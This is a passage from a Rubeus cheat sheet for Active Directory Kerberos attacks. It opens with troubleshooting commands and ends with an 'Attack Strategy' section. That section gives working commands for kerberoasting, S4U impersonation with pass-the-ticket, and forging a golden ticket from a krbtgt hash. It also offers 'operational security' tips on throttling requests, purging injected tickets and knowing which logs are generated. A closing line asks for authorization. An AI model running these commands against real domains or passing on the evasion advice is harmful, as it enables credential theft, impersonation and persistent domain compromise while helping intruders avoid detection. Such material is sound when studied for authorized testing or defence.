w32tm /stripchart /computer:dc01.domain.com /samples:3 /dataonly
w32tm /resync

# Network connectivity to the KDC (TCP/UDP 88)
nslookup dc01.domain.com
Test-NetConnection dc01.domain.com -Port 88

# Kerberos cache state
klist purge
klist

# KDC discovery: the SRV records must resolve from the attacking host
nslookup -type=SRV _kerberos._tcp.domain.com

Debug Mode

# Enable Kerberos client event logging (needs admin). Errors then appear in the System log as Security-Kerberos events (e.g. Event ID 3 with the KDC error code); it is noisy, so set LogLevel back to 0 afterwards
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters" /v LogLevel /t REG_DWORD /d 1 /f

# The KDC-side audit events 4768 (TGT requested) and 4769 (service ticket requested) are written to the Security log of the domain controller, not the System log
Get-WinEvent -ComputerName dc01.domain.com -FilterHashtable @{LogName='Security'; Id=4768,4769} -MaxEvents 50

# Check the local ticket cache
klist tickets

Error Resolution

# KDC_ERR_PREAUTH_FAILED
# Check username/password, account lockout

# KDC_ERR_C_PRINCIPAL_UNKNOWN
# Verify username format and domain

# KDC_ERR_S_PRINCIPAL_UNKNOWN
# Check SPN existence and format

# KRB_AP_ERR_SKEW
# Synchronize time with domain controller

Best Practices

Operational Security

  1. Use legitimate accounts: avoid conspicuous service accounts where possible
  2. Throttle requests: do not flood the domain controller (kerberoast /delay and /jitter)
  3. Time synchronization: keep the clock within the 5-minute Kerberos skew tolerance
  4. Clean up: purge injected tickets (Rubeus.exe purge) and undo any delegation or attribute changes after the operation
  5. Monitor logs: know which security events you generate (4768, 4769 and 4770 on the domain controller)

Attack Strategy

# Start with reconnaissance of the local ticket cache
Rubeus.exe triage
Rubeus.exe klist

# Identify targets without sending a single TGS-REQ: supported encryption types and password ages per roastable account
Rubeus.exe kerberoast /stats

# Execute targeted attacks
Rubeus.exe kerberoast /user:specific_target
Rubeus.exe s4u /user:service /rc4:hash /impersonateuser:admin /msdsspn:cifs/target.domain.com /ptt

# Persistence via a forged TGT (requires the krbtgt key and the domain SID)
Rubeus.exe golden /rc4:krbtgt_hash /user:admin /domain:domain.com /sid:S-1-5-21-...

Resources

- Rubeus GitHub Repository: https://github.com/GhostPack/Rubeus
- Kerberos protocol documentation

*This cheat sheet provides a comprehensive reference for using Rubeus. Always make sure you have proper authorization before performing Active Directory security assessments.*